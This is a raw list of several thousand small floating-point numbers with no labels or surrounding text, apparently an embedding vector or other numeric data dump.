0.004703136160969734, -0.004216860514134169, -0.0077581326477229595, 0.0039087627083063126, 0.006277034524828196, 0.04344554245471954, -0.012754518538713455, -0.032160986214876175, 0.014135392382740974, 0.006603693123906851, -0.0633716955780983, -0.03789235278964043, -0.030022859573364258, -0.0004194588400423527, 0.0028935237787663937, -0.03616997227072716, -0.021203087642788887, 0.03201250731945038, 0.008285240270197392, -0.019139202311635017, 0.027958974242210388, 0.0023200158029794693, -0.010980171151459217, -0.001081127324141562, -0.004792224615812302, -0.0023070236202329397, -0.018634365871548653, -0.0015386344166472554, -0.044692784547805786, 0.01345237996429205, -0.009480512700974941, -0.025984177365899086, 0.02590993605554104, -0.004458142444491386, 0.033527012914419174, -0.018278012052178383, -0.032843999564647675, -0.00900537334382534, -0.00014778500190004706, -0.0011897040531039238, -0.014298721216619015, 0.02686021476984024, -0.001746507827192545, 0.02242063172161579, 0.0056645506992936134, 0.009213246405124664, -0.012301651760935783, 0.011989841237664223, -0.013979487121105194, 0.021559443324804306, 0.0017019635997712612, 0.01603594981133938, 0.021203087642788887, -0.020297354087233543, 0.00013989694707561284, -0.005642278585582972, 0.02856774628162384, -0.003205333836376667, -0.01628836616873741, -0.012895575724542141, -0.02487056888639927, 0.0020750220865011215, 0.010222917422652245, 0.006722477730363607, 0.02207912690937519, -0.00434678141027689, 0.009814594872295856, 0.0023107356391847134, 0.02069825306534767, 0.005044642370194197, -0.016525937244296074, 0.015397480688989162, 0.0024907689075917006, -0.01936192438006401, -0.009235518984496593, 0.001303848926909268, -0.02381635457277298, -0.009799746796488762, 0.014261601492762566, 0.009933379478752613, -0.023890594020485878, 0.01899072155356407, -0.020564619451761246, -0.0025631533935666084, -0.03260643035173416, 0.005337892100214958, 0.01206408254802227, -0.009324607439339161, -0.0002496337110642344, 0.014707043766975403, -0.008196151815354824, -0.00005144634997122921, -0.007713588420301676, 0.00620650639757514, 0.006919214967638254, 0.000455419096397236, -0.0019562372472137213, -0.034596074372529984, 0.009079613722860813, 0.03177493438124657, -0.008997948840260506, 0.02276213839650154, -0.018604669719934464, 0.009228094480931759, -0.010297157801687717, 0.0035357039887458086, -0.001937677152454853, -0.037951745092868805, 0.006867246702313423, -0.017283190041780472, 0.011833936907351017, 0.003207189729437232, -0.025019049644470215, -0.003975579049438238, -0.013073752634227276, -0.004176028538495302, 0.023044252768158913, -0.03067617677152157, -0.020624011754989624, 0.025226924568414688, -0.01763954386115074, -0.017535606399178505, 0.003990427125245333, 0.008945981040596962, 0.03067617677152157, 0.0027246265672147274, -0.02994862012565136, -0.015026277862489223, -0.01627351902425289, -0.010252613574266434, -0.004974113777279854, -0.0026188339106738567, 0.004205724690109491, 0.004888737108558416, 0.0018114682752639055, -0.008389176800847054, 0.00027306584524922073, 0.014172512106597424, 0.02106945589184761, -0.00853023398667574, 0.014558563008904457, 0.022316696122288704, 0.0032907105050981045, -0.0011785679962486029, 0.0264890119433403, 0.057343367487192154, 0.01701592467725277, -0.011900752782821655, 0.023563936352729797, 0.003715737257152796, -0.026949303224682808, 0.004940705839544535, -0.03269551694393158, -0.007249585352838039, 0.004795936401933432, -0.005887271836400032, -0.007691316306591034, 0.001878284732811153, 0.0026206898037344217, 0.02858259528875351, 0.018886784091591835, -0.012219986878335476, -0.011900752782821655, 0.020906126126646996, 0.03406154364347458, -0.02277698740363121, -0.0237569622695446, 0.008626746945083141, 0.0015488425269722939, -0.017268341034650803, 0.008396601304411888, -0.0036192245315760374, 0.014009183272719383, -0.009807170368731022, 0.006759597919881344, -0.002160398755222559, 0.040624406188726425, 0.014165088534355164, 0.015412328764796257, 0.013838429935276508, 0.019985543563961983, -0.0011043275007978082, -0.025746606290340424, 0.010260038077831268, 0.05853121355175972, 0.002913939766585827, 0.03186402469873428, 0.008834620006382465, -0.0019302531145513058, 0.0007558611687272787, -0.0021771027240902185, -0.0047662402503192425, -0.012836183421313763, -0.018188923597335815, 0.006507180165499449, -0.03308156877756119, 0.01977767050266266, 0.005590309854596853, 0.017891962081193924, 0.010497607290744781, 0.017951354384422302, 0.025702062994241714, -0.04053531587123871, -0.01833740435540676, 0.004432158078998327, -0.008166455663740635, -0.013675101101398468, -0.0013279770500957966, -0.012546645477414131, 0.003166357520967722, -0.009072190150618553, -0.01771378517150879, 0.0037250174209475517, 0.030022859573364258, -0.008708410896360874, 0.0015636906027793884, 0.02822623960673809, 0.012709974311292171, -0.0042391326278448105, 0.025226924568414688, -0.02755807526409626, -0.008968252688646317, 0.0071753449738025665, 0.015412328764796257, -0.02308879792690277, 0.0027654587756842375, -0.026800822466611862, 0.01052730344235897, -0.005890984088182449, -0.009554753080010414, -0.00577962351962924, -0.022673049941658974, -0.022212758660316467, -0.008916284888982773, 0.005946664605289698, -0.006785582285374403, 0.023385759443044662, 0.003288854379206896, -0.006269610486924648, 0.0039087627083063126, 0.004101787693798542, -0.020520076155662537, 0.016540784388780594, -0.008099638856947422, -0.003205333836376667, 0.0051374430768191814, 0.004198300652205944, 0.019154049456119537, 0.009101886302232742, 0.006336427293717861, -0.012799062766134739, 0.02420240454375744, -0.011811664327979088, 0.04926599934697151, 0.009020221419632435, -0.021559443324804306, -0.029458632692694664, -0.017505910247564316, -0.012724822387099266, 0.006135977804660797, -0.004517534747719765, -0.026682037860155106, 0.0247814804315567, 0.021262479946017265, 0.015122790820896626, 0.004877601284533739, -0.003715737257152796, 0.008834620006382465, 0.008114486932754517, -0.0019339651335030794, -0.020490380004048347, -0.020579468458890915, -0.0013177689397707582, 0.005950376391410828, 0.006284458562731743, -0.005419556982815266, -0.021678227931261063, -0.026385076344013214, 0.004974113777279854, -0.014714468270540237, 0.01636260747909546, -0.02521207556128502, -0.014246752485632896, 0.0060728732496500015, -0.013318746350705624, -0.010683208703994751, 0.0018096122657880187, -0.01841164566576481, -0.008285240270197392, -0.019540101289749146, -0.005452964920550585, -0.008678714744746685, 0.0032201819121837616, 0.034536682069301605, 0.0068709589540958405, 0.007004591636359692, 0.017595000565052032, 0.0034020710736513138, -0.003602520562708378, 0.01799589768052101, 0.006187946069985628, -0.007683892268687487, 0.00937657617032528, 0.00038489061989821494, -0.015107942745089531, -0.014729316346347332, -0.0035227120388299227, 0.010156101547181606, 0.010564424097537994, -0.014424930326640606, 0.0017186676850542426, -0.0002913939824793488, -0.005219107493758202, -0.002132558496668935, 0.015768682584166527, 0.00469199987128377, -0.018174076452851295, 0.0019915015436708927, -0.016139885410666466, -0.015842923894524574, -0.007951158098876476, -0.0012797206873074174, -0.008559930138289928, 0.02384605072438717, 0.010757449083030224, -0.005267363972961903, -0.00801797490566969, -0.024098467081785202, 0.028345024213194847, -0.002537169260904193, 0.017491063103079796, -0.010475335642695427, 0.012049233540892601, -0.01664472185075283, -0.009762626141309738, 0.01740197464823723, 0.015738986432552338, 0.012182867154479027, 0.028092607855796814, -0.00014465297863353044, 0.018129531294107437, 0.00818130373954773, 0.004680864047259092, -0.0002389616274740547, -0.009814594872295856, 0.016436846926808357, -0.01001504436135292, 0.015813227742910385, -0.01498173363506794, -0.004944417625665665, 0.008634170517325401, 0.012502101249992847, -0.0038308100774884224, 0.008938556537032127, -0.009710658341646194, -0.006681645289063454, 0.013496924191713333, 0.012524372898042202, 0.00772843649610877, -0.0017409397987648845, -0.0006175882299430668, -0.013444955460727215, -0.024246949702501297, 0.015531113371253014, 0.00016158909420482814, -0.0026726580690592527, -0.004005275201052427, -0.013831006363034248, 0.000665380503050983, -0.01479613222181797, 0.019154049456119537, -0.004528671037405729, -0.01497431006282568, 0.0018569406820461154, 0.0013112729648128152, -0.002281039487570524, -0.028107455000281334, -0.011098955757915974, -0.009153854101896286, 0.006358699407428503, -0.014380386099219322, 0.01311829686164856, 0.003968155011534691, 0.004818208981305361, -0.008834620006382465, 0.02414301224052906, -0.01055699959397316, 0.011744847521185875, 0.0012156883021816611, -0.008678714744746685, 0.007765556685626507, -0.007282993756234646, -0.011819088831543922, -0.007260721176862717, -0.0018495165277272463, -0.011945297010242939, -0.00035658641718328, 0.00006020440923748538, -0.008166455663740635, -0.003468887647613883, 0.015887467190623283, -0.024915114045143127, 0.004706847947090864, 0.02142580971121788, 0.00934688001871109, 0.04451460763812065, 0.00378440972417593, 0.018649214878678322, -0.003196053672581911, -0.007817525416612625, -0.00009036461415234953, -0.007052848115563393, 0.005835303571075201, 0.007542835548520088, 0.002828563330695033, -0.022524569183588028, 0.010386246256530285, -0.015872620046138763, -0.002802578965201974, -0.0029993164353072643, -0.0010217349044978619, -0.01020806934684515, 0.030052555724978447, -0.013036632910370827, 0.008055094629526138, -0.029042884707450867, 0.01516733504831791, -0.03364579752087593, -0.020846733823418617, 0.004016411490738392, 0.011692879721522331, -0.02626628987491131, -0.0005864999839104712, 0.018842240795493126, 0.015182183124125004, -0.015442024916410446, -0.00834463257342577, -0.017119860276579857, 0.0018328124424442649, -0.013385563157498837, -0.0026466739363968372, -0.016867442056536674, 0.034863341599702835, -0.01257634162902832, 0.03916928917169571, -0.002527889097109437, -0.012182867154479027, -0.014647651463747025, 0.01324450597167015, 0.00919839832931757, -0.006588845048099756, -0.021589139476418495, 0.006058025173842907, 0.008322360925376415, -0.01545687299221754, -0.004528671037405729, 0.014432353898882866, 0.00919839832931757, 0.0006287242867983878, 0.01444720197468996, -0.000942854443565011, -0.019896455109119415, -0.018619518727064133, -0.00450268667191267, 0.011744847521185875, 0.009124157950282097, 0.006458924151957035, -0.010571847669780254, 0.016570480540394783, 0.019881607964634895, -0.0071753449738025665, 0.006989743560552597, 0.008233272470533848, 0.0221236702054739, -0.010534727945923805, 0.0032405981328338385, 0.0032814303413033485, -0.0096958102658391, 0.03441789746284485, -0.01463280338793993, -0.015753835439682007, 0.006510892417281866, -0.009680962190032005, -0.022673049941658974, -0.005404708907008171, -0.01055699959397316, 0.029072582721710205, -0.0039792913012206554, -0.01001504436135292, 0.001338185160420835, 0.03492273390293121, 0.007884341292083263, 0.0004570431192405522, 0.011618639342486858, 0.004072091542184353, 0.006113705690950155, 0.024261796846985817, -0.014484322629868984, -0.017446517944335938, -0.005285923834890127, 0.012999512255191803, 0.008166455663740635, -0.01942131668329239, -0.008233272470533848, -0.011848784983158112, -0.00628817081451416, -0.008908860385417938, 0.004795936401933432, 0.02184155583381653, -0.004569503013044596, 0.008136759512126446, -0.005723943002521992, 0.014907493256032467, -0.010690632276237011, 0.014840677380561829, -0.022316696122288704, 0.022212758660316467, -0.00802539847791195, -0.0006881167064420879, 0.006915503181517124, -0.022925468161702156, -0.004461854230612516, -0.009740354493260384, -0.007442610803991556, 0.013882974162697792, -0.007249585352838039, -0.010445639491081238, 0.011291980743408203, -0.018203772604465485, 0.002791442908346653, 0.0013186970027163625, 0.018129531294107437, -0.0005939240218140185, 0.015048550441861153, -0.007338673807680607, 0.016570480540394783, -0.014759012497961521, -0.012554069049656391, -0.028998341411352158, 0.0011163916205987334, 0.011150923557579517, 0.004001563414931297, -0.00966611411422491, 0.024603303521871567, 0.021232783794403076, -0.006377259269356728, 0.013786462135612965, -0.02144065871834755, 0.005375012755393982, -0.002262479392811656, -0.0061693862080574036, 0.03477425128221512, -0.005853863898664713, 0.028077758848667145, -0.018634365871548653, 0.0017817721236497164, -0.0054455408826470375, -0.017090164124965668, 0.023296670988202095, -0.006707629654556513, 0.014239328913390636, 0.03703116253018379, 0.020490380004048347, -0.009628993459045887, -0.009636417962610722, -0.003116245148703456, 0.005946664605289698, 0.009591872803866863, -0.008626746945083141, -0.007535411044955254, -0.01210120227187872, -0.022673049941658974, 0.010980171151459217, 0.003082836978137493, 0.01905011385679245, 0.020267657935619354, -0.00967353768646717, -0.000026709181838668883, -0.008225847966969013, -0.013066329061985016, -0.0271720252931118, -0.00259841769002378, 0.014061152003705502, 0.0037806977052241564, -0.023920290172100067, 0.008470841683447361, -0.022866075858473778, 0.010430791415274143, 0.003773273667320609, -0.00476995250210166, 0.018545277416706085, 0.0018940608715638518, 0.013044056482613087, -0.014862949028611183, 0.02822623960673809, 0.0005456677172333002, 0.00970323383808136, 0.00434678141027689, -0.013222234323620796, 0.0034224872943013906, 0.0018476605182513595, -0.004380189813673496, -0.003875354304909706, -0.010801993310451508, 0.004565791226923466, -0.00586128793656826, -0.013489499688148499, 0.012940119951963425, 0.0035041519440710545, 0.002711634384468198, 0.0007284849416464567, -0.009072190150618553, -0.0005303556099534035, 0.0033649508841335773, 0.02580600045621395, 0.03055739216506481, 0.017817720770835876, 0.0036173686385154724, -0.009985348209738731, 0.021529747173190117, -0.014840677380561829, 0.005375012755393982, 0.004409885965287685, 0.008277816697955132, -0.008797500282526016, -0.0032480221707373857, -0.00007830053073121235, 0.0026318258605897427, 0.017268341034650803, 0.004253981169313192, 0.006514604203402996, 0.010059588588774204, 0.001226824359036982, -0.007787828799337149, 0.01798105053603649, -0.0016731953946873546, -0.015382632613182068, -0.002184526761993766, 0.00612855376675725, -0.02037159539759159, 0.010883658193051815, 0.00009918067371472716, -0.012932696379721165, -0.009413695894181728, -0.028716227039694786, 0.02105460688471794, 0.017802873626351357, 0.006228778511285782, -0.009027644991874695, -0.010349126532673836, 0.010126404464244843, 0.0023589921183884144, -0.02853805013000965, 0.01124743651598692, 0.0001140287786256522, -0.021693075075745583, 0.0022587673738598824, -0.011351373046636581, -0.007086256053298712, -0.028508353978395462, 0.006971183232963085, 0.00967353768646717, -0.013548891991376877, 0.012108626775443554, 0.005560613702982664, 0.012546645477414131, -0.009361728094518185, 0.004380189813673496, -0.02582084760069847, 0.007368369959294796, -0.01596170850098133, 0.011418189853429794, 0.006529452279210091, -0.0076022278517484665, -0.009747778065502644, 0.0012361044064164162, -0.022895772010087967, 0.00492956954985857, 0.005668262485414743, -0.028745923191308975, -0.02556842938065529, 0.011336524970829487, 0.015620201826095581, -0.005827879533171654, 0.025063594803214073, -0.0014801700599491596, -0.005530917551368475, 0.0031181012745946646, 0.003509719856083393, 0.005104034673422575, 0.0044395821169018745, -0.004098075907677412, 0.004985250066965818, 0.004120348021388054, 0.009406272321939468, -0.003957018721848726, -0.003945882897824049, 0.022004885599017143, 0.009680962190032005, 0.015338088385760784, 0.011499853804707527, -0.0010894794249907136, -0.00000639091831544647, -0.010126404464244843, 0.01137364562600851, -0.0043876138515770435, -0.02112884819507599, -0.030082251876592636, 0.009324607439339161, -0.011923025362193584, 0.004554654937237501, -0.026414772495627403, 0.010067012161016464, -0.01447689812630415, 0.01241301279515028, 0.022034581750631332, -0.0005104034789837897, -0.020564619451761246, -0.02112884819507599, 0.009131582453846931, -0.012205138802528381, -0.046088505536317825, 0.015872620046138763, 0.01209377869963646, 0.005475237034261227, -0.01308117713779211, 0.010950474068522453, 0.020163720473647118, 0.003457751590758562, -0.02686021476984024, 0.021603986620903015, 0.005464101210236549, -0.021603986620903015, -0.009903683327138424, 0.010683208703994751, -0.007513138931244612, 0.0038902023807168007, 0.017119860276579857, -0.0036359287332743406, 0.0036452088970690966, 0.013341018930077553, 0.0028768195770680904, 0.006340139079838991, -0.01209377869963646, 0.017595000565052032, -0.021217936649918556, 0.00655914843082428, 0.0030958291608840227, -0.0015813227510079741, -0.0063438513316214085, -0.016199277713894844, 0.007691316306591034, -0.0007113168248906732, -0.008745531551539898, 0.007286705542355776, -0.00281185912899673, -0.009836866520345211, 0.012249683029949665, -0.002650385955348611, -0.01137364562600851, -0.006284458562731743, -0.00391989853233099, 0.010831689462065697, 0.021247632801532745, 0.008945981040596962, 0.008129335008561611, -0.0023571359924972057, 0.004677151795476675, -0.014380386099219322, 0.024039074778556824, 0.0026540979743003845, -0.024336038157343864, -0.0000975566654233262, -0.0027543227188289165, 0.010534727945923805, 0.025642670691013336, 0.009985348209738731, -0.028508353978395462, -0.017832569777965546, -0.005104034673422575, 0.020000392571091652, -0.010675784200429916, -0.006952623371034861, -0.010660936124622822, -0.026102961972355843, -0.0031515094451606274, -0.006406955420970917, -0.01495203748345375, 0.005259939935058355, -0.012049233540892601, -0.006009768694639206, 0.0012658005580306053, 0.008931132964789867, -0.008218423463404179, 0.023712417110800743, -0.039971087127923965, -0.009814594872295856, -0.022316696122288704, 0.034150633960962296, 0.0016843314515426755, -0.013637980446219444, 0.022569114342331886, -0.018129531294107437, -0.016926834359765053, -0.026355380192399025, 0.018886784091591835, -0.0006287242867983878, 0.018500734120607376, -0.011967569589614868, -0.009525056928396225, 0.023742113262414932, 0.007876917719841003, -0.006666797213256359, -0.015197031199932098, 0.00345218344591558, -0.006032041274011135, -0.006878382991999388, 0.024261796846985817, 0.022910619154572487, -0.0221236702054739, -0.02046068385243416, -0.00357096828520298, -0.02588023990392685, -0.002008205745369196, -0.008129335008561611, -0.03337853029370308, -0.011789392679929733, -0.008767803199589252, -0.026370227336883545, 0.006388395559042692, -0.009740354493260384, -0.004736544098705053, 0.009762626141309738, 0.0071790567599236965, -0.03753599897027016, 0.0187086071819067, -0.006150825880467892, -0.009584449231624603, 0.011789392679929733, 0.013177690096199512, -0.0011033995542675257, 0.017877113074064255, -0.008277816697955132, -0.0016258670948445797, 0.00426140520721674, -0.03290339186787605, 0.015234151855111122, -0.005367588717490435, 0.0029157958924770355, 0.0026930742897093296, 0.007698740344494581, 0.013207386247813702, 0.014320993795990944, -0.02350454404950142, 0.00442102225497365, 0.015367784537374973, 0.0018365244613960385, 0.009487936273217201, 0.014462050050497055, -0.00636983523145318, 0.027082936838269234, -0.025108138099312782, -0.004751392174512148, 0.005256227683275938, 0.017921658232808113, 0.004454430192708969, -0.004599199164658785, -0.0035950965248048306, -0.012806487269699574, -0.0152935441583395, -0.00967353768646717, -0.018827391788363457, 0.010957898572087288, 0.018292861059308052, 0.0021678227931261063, 0.009064765647053719, 0.002037901896983385, -0.0037175933830440044, -0.004539806861430407, 0.004168604500591755, 0.0034020710736513138, 0.019955847412347794, 0.030735569074749947, -0.008790075778961182, 0.0004983394173905253, 0.0005136514664627612, -0.010482759214937687, 0.000928934314288199, -0.00023084157146513462, -0.016214126721024513, -0.011804240755736828, 0.0017622839659452438, 0.007765556685626507, -0.005813031457364559, 0.025345709174871445, -0.01017837319523096, -0.013912670314311981, -0.020995214581489563, 0.0033593829721212387, 0.010594120249152184, 0.03566513955593109, 0.011002442799508572, -0.007357234135270119, -0.013600860722362995, -0.009747778065502644, 0.01738712564110756, -0.02754322811961174, 0.00008247655932791531, 0.002975188195705414, -0.02072794921696186, -0.024246949702501297, -0.025969328358769417, 0.018471037968993187, 0.011002442799508572, 0.026682037860155106, -0.005679398775100708, 0.02173762023448944, 0.013378138653934002, -0.01478870864957571, -0.012286803685128689, -0.013281626626849174, 0.008114486932754517, -0.004428446292877197, -0.012851031497120857, -0.0028582594823092222, 0.02784018963575363, -0.013630556873977184, -0.0023274398408830166, -0.004272541031241417, 0.0152935441583395, 0.00508547481149435, -0.006674221251159906, 0.011492430232465267, -0.016837745904922485, -0.0016963955713436007, -0.0016908275429159403, -0.017461366951465607, -0.009814594872295856, -0.005794471595436335, -0.01141076534986496, -0.0027951549272984266, -0.0012361044064164162, 0.005133730825036764, -0.0006983247585594654, 0.00953990500420332, 0.023712417110800743, 0.018263164907693863, 0.0073312497697770596, -0.004703136160969734, -0.028434112668037415, 0.020817037671804428, 0.021514898166060448, -0.0005349956336431205, -0.009361728094518185, -0.009265215136110783, -0.008923708461225033, 0.010861385613679886, 0.009361728094518185, 0.007372082211077213, 0.0038902023807168007, -0.019243139773607254, -0.010698056779801846, -0.014892645180225372, -0.018471037968993187, 0.005211683455854654, 0.008203575387597084, 0.0005595877883024514, 0.015189607627689838, -0.0011637199204415083, -0.015397480688989162, 0.003650776809081435, 0.008255544118583202, -0.01805528998374939, -0.007238449063152075, -0.00802539847791195, -0.00818872731178999, 0.01532324030995369, -0.005965224467217922, -0.01446947455406189, -0.016392303630709648, 0.0016045229276642203, -0.006718765944242477, 0.008804923854768276, -0.017431670799851418, -0.04023835435509682, -0.0022569112479686737, -0.01430614572018385, 0.001622155075892806, -0.0073312497697770596, 0.007101104129105806, -0.005159715190529823, 0.007498290855437517, -0.0026856502518057823, -0.0296368096023798, 0.01876799948513508, -0.004495262634009123, -0.009183550253510475, -0.00032851423020474613, 0.018545277416706085, 0.0022067991085350513, -0.012368468567728996, 0.024246949702501297, -0.017951354384422302, 0.025241771712899208, 0.013957214541733265, -0.005549477878957987, -0.010274886153638363, -0.020267657935619354, 0.0003707385330926627, 0.02144065871834755, 0.012650582008063793, -0.007750708609819412, -0.000010382070286141243, -0.010074436664581299, -0.006603693123906851, -0.005104034673422575, 0.012539220973849297, 0.010816841386258602, 0.014246752485632896, -0.017431670799851418, -0.01498173363506794, -0.014959461987018585, -0.0001744651817716658, 0.015620201826095581, -0.013920094817876816, -0.013660253025591373, 0.01037139818072319, -0.009896259754896164, -0.011796816252171993, -0.002741330536082387, -0.008411449380218983, -0.02243548072874546, 0.0052896360866725445, -0.030171342194080353, 0.018946176394820213, 0.0010894794249907136, -0.005694246850907803, 0.011210315860807896, -0.028092607855796814, -0.0006208362174220383, -0.011900752782821655, 0.0170010756701231, -0.007208752911537886, -0.030884049832820892, 0.011336524970829487, 0.02179701253771782, -0.0040349713526666164, 0.004461854230612516, -0.002925075823441148, 0.002123278332874179, -0.017194101586937904, -0.004391326103359461, -0.017194101586937904, -0.010913354344666004, 0.009257790632545948, -0.0014421218074858189, 0.012873303145170212, -0.008404024876654148, 0.01545687299221754, 0.0013465371448546648, -0.008879164233803749, 0.018174076452851295, -0.012888152152299881, -0.01600625365972519, -0.0096958102658391, -0.010260038077831268, -0.0019543813541531563, 0.00485161691904068, 0.0073275379836559296, -0.047781188040971756, -0.009027644991874695, 0.04264374449849129, 0.02688991092145443, -0.017164405435323715, -0.019614340737462044, 0.00749086681753397, -0.006406955420970917, 0.0048664649948477745, -0.0018151802942156792, -0.004896161146461964, 0.011997265741229057, -0.012294227257370949, 0.013474651612341404, -0.013474651612341404, -0.003945882897824049, 0.007698740344494581, -0.006588845048099756, 0.00830751284956932, 0.01087623368948698, -0.016392303630709648, 0.014491746202111244, 0.02242063172161579, 0.030854353681206703, 0.007097392342984676, 0.009176126681268215, -0.021915797144174576, -0.017298037186264992, -0.002281039487570524, -0.0021418386604636908, -0.015055974014103413, 0.009903683327138424, 0.0001062567243934609, 0.0015228583943098783, 0.03165614977478981, 0.0030085963662713766, -0.01105441153049469, -0.013482076115906239, 0.0021585426293313503, -0.01799589768052101, -0.001258376520127058, -0.022687898948788643, 0.01703077182173729, 0.024944810196757317, 0.015753835439682007, 0.03260643035173416, 0.009599297307431698, -0.014157664030790329, 0.015516265295445919, -0.00018618126341607422, 0.0031013970728963614, 0.007527987007051706, -0.016911987215280533, 0.005991208832710981, 0.0210991520434618, -0.022613657638430595, -0.019881607964634895, -0.014157664030790329, -0.008968252688646317, 0.00935430359095335, 0.006354987155646086, -0.01569444313645363, -0.013378138653934002, -0.0009354303474538028, 0.020980367437005043, 0.02856774628162384, 0.015122790820896626, -0.0070751202292740345, 0.003450327552855015, -0.010883658193051815, -0.02276213839650154, -0.0079882787540555, 0.004450718406587839, 0.013838429935276508, 0.019124353304505348, -0.0005735079175792634, 0.022509722039103508, -0.030186189338564873, 0.004176028538495302, -0.0007103888201527297, -0.0012314643245190382, -0.0023608480114489794, 0.0049666897393763065, 0.006002344656735659, -0.00434678141027689, 0.0034057830926030874, -0.0014588258927688003, -0.009955652058124542, -0.018589822575449944, -0.011470157653093338, -0.004480414558202028, 0.0002809539146255702, -0.012190290726721287, -0.019837062805891037, 0.029696201905608177, 0.0001219168261741288, 0.001771564013324678, -0.013214809820055962, 0.018530430272221565, 0.011804240755736828, -0.0006964687490835786, -0.03611057996749878, 0.002605841727927327, 0.00027399384998716414, 0.008990525268018246, 0.0007205969304777682, 0.008945981040596962, 0.009636417962610722, 0.008240696042776108, 0.002180814743041992, 0.007980854250490665, 0.0027357626240700483, 0.0011238156585022807, -0.019614340737462044, 0.012799062766134739, -0.015753835439682007, 0.0008045814465731382, -0.013177690096199512, -0.006492332089692354, -0.028300480917096138, -0.005679398775100708, 0.03027527779340744, 0.004703136160969734, 0.019510405138134956, -0.017461366951465607, -0.028092607855796814, 0.0015024421736598015, -0.018574973568320274, 0.0032999904360622168, -0.006618541199713945, 0.004974113777279854, -0.014580835588276386, 0.014588259160518646, -0.009807170368731022, 0.01772863231599331, 0.016080493107438087, 0.0019265410955995321, -0.006522028241306543, 0.010111556388437748, -0.020831884816288948, -0.003183061722666025, 0.02141096256673336, -0.003507863963022828, 0.0034781675785779953, 0.023593632504343987, -0.003957018721848726, 0.005245091859251261, -0.0017325878143310547, 0.0013474652078002691, 0.015093094669282436, -0.03379427641630173, -0.004172316286712885, 0.0001219168261741288, -0.029711050912737846, -0.009094461798667908, 0.020490380004048347, -0.010453063063323498, 0.013890398666262627, 0.008055094629526138, -0.008834620006382465, -0.022539418190717697, 0.007145648822188377, 0.02549418993294239, 0.01548656914383173, 0.007735860534012318, -0.02614750526845455, -0.004161180462688208, -0.0001588050799909979, -0.01226453110575676, 0.0068227024748921394, -0.02044583484530449, 0.011492430232465267, -0.004142620135098696, 0.0110247153788805, 0.01662987284362316, -0.009413695894181728, -0.036259062588214874, 0.018485885113477707, -0.009257790632545948, 0.008248120546340942, -0.01532324030995369, -0.015798378735780716, -0.00881977193057537, 0.004524958785623312, 0.025924785062670708, -0.018946176394820213, 0.0039124744944274426, 0.0011729999678209424, 0.006518316455185413, -0.006377259269356728, -0.0010347270872443914, 0.014194784685969353, -0.02074279636144638, -0.008678714744746685, -0.016214126721024513, -0.005252515897154808, 0.0255387332290411, -0.009918531402945518, -0.01273967046290636, 0.009732929989695549, -0.02178216353058815, -0.0076541961170732975, 0.010267461650073528, 0.0009512064862065017, -0.004784800577908754, -0.0020620301365852356, 0.011640910990536213, 0.004736544098705053, 0.009814594872295856, 0.002559441374614835, -0.024929961189627647, -0.007264433428645134, 0.020252808928489685, -0.00935430359095335, -0.012873303145170212, -0.01899072155356407, 0.022569114342331886, 0.01447689812630415, -0.014016607776284218, -0.009911107830703259, 0.0074537466280162334, 0.0020861581433564425, 0.0014328417601063848, -0.0019246850861236453, 0.004042395390570164, 0.017298037186264992, 0.0015061541926115751, -0.0003396503161638975, -0.00508547481149435, 0.015338088385760784, 0.006087721325457096, 0.027439290657639503, 0.0058167437091469765, -0.00458063930273056, 0.00041667482582852244, 0.014246752485632896, 0.012056658044457436, 0.010839113965630531, 0.010779721662402153, -0.003641496878117323, -0.02013402432203293, -0.010972746647894382, -0.004450718406587839, 0.014462050050497055, 0.001471817959100008, 0.022019734606146812, 0.013719645328819752, 0.0040832278318703175, -0.016199277713894844, -0.0005753639270551503, 0.023029403761029243, -0.009532480500638485, 0.0008389176800847054, -0.01138106919825077, 0.02141096256673336, 0.001774348085746169, 0.022168215364217758, -0.008270392194390297, -0.004042395390570164, 0.004354205448180437, -0.009139006026089191, -0.015308392234146595, 0.0180255938321352, -0.005471525248140097, 0.008678714744746685, -0.014647651463747025, 0.007249585352838039, 0.02317788638174534, 0.006458924151957035, -0.00594295235350728, -0.012672854587435722, 0.0024907689075917006, 0.0010337990242987871, 0.021707924082875252, -0.019554948434233665, 0.005000098142772913, 0.01741682179272175, -0.0054455408826470375, 0.0039087627083063126, 0.007891765795648098, -0.013853278011083603, 0.003886490361765027, 0.018307708203792572, -0.009087038226425648, 0.0042391326278448105, 0.0035338480956852436, 0.009317182935774326, -0.0013882974162697792, 0.00364892091602087, 0.019525252282619476, -0.001380873378366232, 0.004729120060801506, -0.019896455109119415, -0.016258670017123222, 0.011685455217957497, 0.01634775847196579, 0.0018727167043834925, 0.009643841534852982, 0.022034581750631332, -0.005504933651536703, 0.0026800823397934437, 0.01772863231599331, 0.0005911400076001883, 0.019926151260733604, -0.024024227634072304, -0.0047142719849944115, -0.01494461391121149, -0.003934746608138084, -0.011640910990536213, -0.01905011385679245, -0.013073752634227276, -0.009287486784160137, 0.017565304413437843, 0.005259939935058355, 0.017609847709536552, -0.006934063043445349, 0.02206427790224552, -0.008775227703154087, 0.015887467190623283, 0.010564424097537994, -0.005337892100214958, 0.03097313828766346, -0.012294227257370949, -0.007891765795648098, 0.008144183084368706, 0.012680278159677982, 0.008931132964789867, 0.009777474217116833, 0.012784214690327644, 0.0021139984019100666, -0.0020453259348869324, -0.014068575575947762, 0.015768682584166527, 0.004680864047259092, -0.01207150612026453, 0.00852281041443348, 0.0013734493404626846, -0.007631924003362656, -0.028864707797765732, 0.022390935570001602, -0.009213246405124664, 0.003459607483819127, -0.018931329250335693, 0.013920094817876816, 0.0024276645854115486, -0.007167920935899019, 0.006065449211746454, 0.0014384097885340452, -0.004836768843233585, -0.01907981000840664, 0.009955652058124542, -0.008478265255689621, 0.018203772604465485, 0.008277816697955132, 0.011574095115065575, 0.019866758957505226, 0.014543714933097363, 0.0011052555637434125, -0.001283432706259191, 0.004669727757573128, 0.001653707236982882, 0.0017158837290480733, -0.020891278982162476, -0.014076000079512596, 0.013289050199091434, 0.0013001367915421724, 0.003196053672581911, 0.01040109433233738, 0.03474455699324608, 0.010133828967809677, -0.010616391897201538, -0.001090407371520996, 0.006841262336820364, 0.013660253025591373, 0.012457557022571564, 0.03738752007484436, 0.0007159568485803902, 0.015397480688989162, -0.013704797253012657, 0.011455309577286243, -0.02319273352622986, -0.013133144937455654, 0.02181185968220234, 0.023682720959186554, 0.01933222822844982, 0.018174076452851295, -0.012539220973849297, 0.016852594912052155, 0.010601543821394444, -0.002587281633168459, -0.011358797550201416, 0.0001257448602700606, -0.003346390789374709, -0.0026114098727703094, 0.005092898849397898, -0.0022142231464385986, -0.002566865412518382, -0.0014244896592572331, 0.016436846926808357, 0.0060691614635288715, 0.0021882387809455395, 0.014231904409825802, -0.024009378626942635, 0.0049184332601726055, -0.003660056972876191, 